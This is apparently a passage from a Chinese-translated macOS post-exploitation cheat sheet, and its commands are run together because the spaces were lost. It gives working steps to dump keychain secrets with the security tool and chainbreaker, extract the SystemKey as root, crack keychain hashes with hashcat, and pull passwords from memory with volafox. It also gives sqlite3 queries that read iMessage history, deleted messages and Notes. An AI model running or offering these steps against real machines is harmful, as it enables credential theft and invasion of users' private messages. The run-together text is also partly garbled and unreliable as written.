#securitysecuritydump-trust-settings [-s] [-d] #List certificatessecuritylist-keychains#List keychain dbssecuritylist-smartcards#List smartcardssecuritydump-keychain|grep-A5"keychain"|grep-v"version"#List keychains entriessecuritydump-keychain-d#Dump all the info, included secrets (the user will be asked for his password, even if root)
#Dump all keys of the keychain (without the passwords)python2.7chainbreaker.py--dump-all/Library/Keychains/System.keychain
使用 SystemKey 转储钥匙串密钥(带密码)
# First, get the keychain decryption key# To get this decryption key you need to be root and SIP must be disabledhexdump-s8-n24-e'1/1 "%.2x"'/var/db/SystemKey&&echo## Use the previous key to decrypt the passwordspython2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
转储钥匙串密钥(带密码)破解哈希
# Get the keychain hashpython2.7chainbreaker.py--dump-keychain-password-hash/Library/Keychains/System.keychain# Crack it with hashcathashcat.exe-m23100--keep-guessinghashes.txtdictionary.txt# Use the key to decrypt the passwordspython2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
#Use volafox (https://github.com/n0fate/volafox) to extract possible keychain passwords# Unformtunately volafox isn't working with the latest versions of MacOSpythonvol.py-i~/Desktop/show/macosxml.mem-okeychaindump#Try to extract the passwords using the extracted keychain passwordspython2.7 chainbreaker.py --dump-all --key 0293847570022761234562947e0bcd5bc04d196ad2345697 /Library/Keychains/System.keychain
使用用户密码转储钥匙串密钥(带密码)
如果您知道用户的密码,您可以使用它来转储和解密属于该用户的钥匙串。
#Prompt to ask for the passwordpython2.7chainbreaker.py--dump-all--password-prompt/Users/<username>/Library/Keychains/login.keychain-db
sqlite3 $HOME/Library/Messages/chat.db.tablessqlite3 $HOME/Library/Messages/chat.db'select * from message'sqlite3 $HOME/Library/Messages/chat.db'select * from attachment'sqlite3 $HOME/Library/Messages/chat.db'select * from deleted_messages'sqlite3 $HOME/Suggestions/snippets.db'select * from emailSnippets'
sqlite3~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite.tables#To dump it in a readable format:for i in $(sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select Z_PK from ZICNOTEDATA;"); do sqlite3 ~/Library/Group\ Containers/group.com.apple.notes/NoteStore.sqlite "select writefile('body1.gz.z', ZDATA) from ZICNOTEDATA where Z_PK = '$i';"; zcat body1.gz.Z ; done
[...]<key>dsRecTypeStandard:Computers</key><dict><key>dsAttrTypeNative:ShadowHashData</key><array><dict><!-- allow wheel even though it's implicit --><key>uuid</key><string>ABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000</string><key>permissions</key><array><string>readattr</string><string>writeattr</string></array></dict></array><key>dsAttrTypeNative:KerberosKeys</key><array><dict><!-- allow wheel even though it's implicit --><key>uuid</key><string>ABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000</string><key>permissions</key><array><string>readattr</string><string>writeattr</string></array></dict></array>[...]
